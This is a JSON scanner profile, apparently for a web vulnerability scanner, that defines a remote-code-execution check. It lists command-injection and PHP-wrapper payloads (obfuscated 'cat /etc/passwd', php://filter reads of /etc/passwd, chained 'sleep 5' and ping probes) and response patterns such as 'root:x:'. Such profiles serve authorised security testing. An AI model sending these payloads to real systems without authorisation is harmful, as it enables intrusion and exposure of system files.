[
 {
  "Name": "ACTIVE - Remote Code Execution", 
  "Active": false, 
  "Scanner": 1, 
  "Payloads": [
   "phpinfo()", 
   "a=e; b=t; c=c; d=p; e=a; f=s; g=w; h=d; cat /$a$b$c/$d$e$f$f$g$h", 
   "data://text/plain;base64,cGhwaW5mbygpCg==", 
   "php://filter/convert.base64-encode/resource=/etc/passwd", 
   ";cat$u+/etc$u/passwd$u", 
   "sleep 5", 
   "$(sleep 5)", 
   "INJECTX;sleep 5", 
   "INJECTX;sleep 5", 
   "INJECTX|sleep 5", 
   "INJECTX||sleep 5", 
   "INJECTX && sleep 5", 
   "INJECTX|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\\\" |ping -n 21 127.0.0.1 "
  ], 
  "Encoder": [
   "URL-encode key characters"
  ], 
  "UrlEncode": true, 
  "CharsToUrlEncode": " &?\"=#", 
  "Grep": [
   "$_SERVER", 
   "Registered Stream Filters ", 
   "INJECTX123", 
   "root:x:"
  ], 
  "PayloadResponse": false, 
  "NotResponse": false, 
  "NotCookie": false, 
  "TimeOut": 0, 
  "isTime": false, 
  "CaseSensitive": false, 
  "isReplace": false, 
  "ExcludeHTTP": false, 
  "OnlyHTTP": false, 
  "IsContentType": false, 
  "ContentType": "", 
  "NegativeCT": false, 
  "IsResponseCode": false, 
  "ResponseCode": "", 
  "NegativeRC": false, 
  "MatchType": 1, 
  "RedirType": 0, 
  "MaxRedir": 0, 
  "rCookies": false, 
  "spaceEncode": false, 
  "payloadPosition": 1, 
  "sEncode": "", 
  "payloadsFile": "", 
  "grepsFile": "", 
  "IssueName": "RCE", 
  "IssueSeverity": "High", 
  "IssueConfidence": "Tentative", 
  "IssueDetail": "RCE", 
  "RemediationDetail": "RCE", 
  "IssueBackground": "RCE", 
  "RemediationBackground": "RCE"
 }
]